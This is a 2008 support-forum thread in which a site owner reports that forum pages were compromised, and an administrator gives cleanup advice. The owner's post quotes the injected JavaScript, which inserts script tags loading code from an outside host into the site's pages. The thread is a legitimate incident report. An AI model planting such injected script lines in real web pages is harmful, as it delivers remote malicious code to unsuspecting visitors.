Web Wiz - Green Windows Web Hosting
Web Wiz Homepage Search Web Wiz

  New Posts New Posts RSS Feed - File injection/update
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

File injection/update
 Post Reply Post Reply
Author
  Topic Search Topic Search  Topic Options Topic Options
ohiopbx View Drop Down
Groupie
Groupie


Joined: 21 February 2005
Location: United States
Status: Offline
Points: 124 		Post Options Post Options   Thanks (0) Thanks(0)   Quote ohiopbx Quote  Post ReplyReply Direct Link To This Post Topic: File injection/update
    Posted: 17 July 2008 at 4:03pm

The past few days our forum was comprimised. Our RTE_popup_word_paste.asp was modified outside my control. The javascript was updated:

 var iframeContent;
 iframeContent  = '<html>\n';
 iframeContent += '<head>\n';
 iframeContent += '<style> html,body{border:0px;background-color:#FFFFFF;}</style>\n';
 iframeContent += '</head>\n';
 iframeContent += '<body leftmargin="1" topmargin="1" marginwidth="1" marginheight="1">\n';
 iframeContent += '<script src=http://www.cliprts.com/fgg.js></script></body>\n';
 iframeContent += '</html>';
 
Also on other pages it would have this at the end of the file:
<script src=http://www.cliprts.com/fgg.js></script></body>
 
I have no idea hows these files are getting hacked but its quite frustrating. I cannot find anything online. I have changed all my passwords and everything but i dont think thats the issue because i use pretty tough passwords for my stuff...
 
any idea's would be appreciated.
 
Back to Top
WebWiz-Bruce View Drop Down
Admin Group
Admin Group
Avatar
Web Wiz Developer

Joined: 03 September 2001
Location: Bournemouth
Status: Offline
Points: 9844 		Post Options Post Options   Thanks (0) Thanks(0)   Quote WebWiz-Bruce Quote  Post ReplyReply Direct Link To This Post Posted: 17 July 2008 at 4:43pm
As long as you have kept your Web Wiz Forums up to date with the latest version they will not have done this through Web Wiz Forums.

There are many ways this could have happened and the hacker may have even done it through another web site on the same server if your host has not locked down the server.

Usually these types of hacks are done when a hacker places malicouse files on the server which they then use a back door to get into the site and deface it whenever they want.

There are also serveral viruses at present which place this type of code into web pages that it finds on the computer, so it may be that there is a virus on the server or your computer.

What you will need to do is make is

1. Make sure you know what is in all files on your website and remove any files that you don't know what they are.
2. Scan your computer for viruses.
3. Contact your web host. There may have been other sites hacked.
4. Have your web host virus scan the server
5. Have your web host chnage the permissions for your web site to 'Read' only.
Web Wiz Forums Hosting
ASP.NET Web Hosting
Back to Top
ohiopbx View Drop Down
Groupie
Groupie


Joined: 21 February 2005
Location: United States
Status: Offline
Points: 124 		Post Options Post Options   Thanks (0) Thanks(0)   Quote ohiopbx Quote  Post ReplyReply Direct Link To This Post Posted: 18 July 2008 at 3:46am
i agree, i need to contact Godaddy asap thanks bud
Back to Top
 Post Reply Post Reply

Forum Jump Forum Permissions View Drop Down

Forum Software by Web Wiz Forums® version 12.08
Copyright ©2001-2026 Web Wiz Ltd.

Become a Fan on Facebook Follow us on X Connect with us on LinkedIn Web Wiz Blogs
About Web Wiz | Contact Web Wiz | Terms & Conditions | Cookies | Privacy Notice

Web Wiz is the trading name of Web Wiz Ltd. Company registration No. 05977755. Registered in England and Wales.
Registered office: Web Wiz Ltd, Unit 18, The Glenmore Centre, Fancy Road, Poole, Dorset, BH12 4FB, UK.

Prices exclude VAT at 20% unless otherwise stated. VAT No. GB988999105 - $, € prices shown as a guideline only.

Copyright ©2001-2026 Web Wiz Ltd. All rights reserved.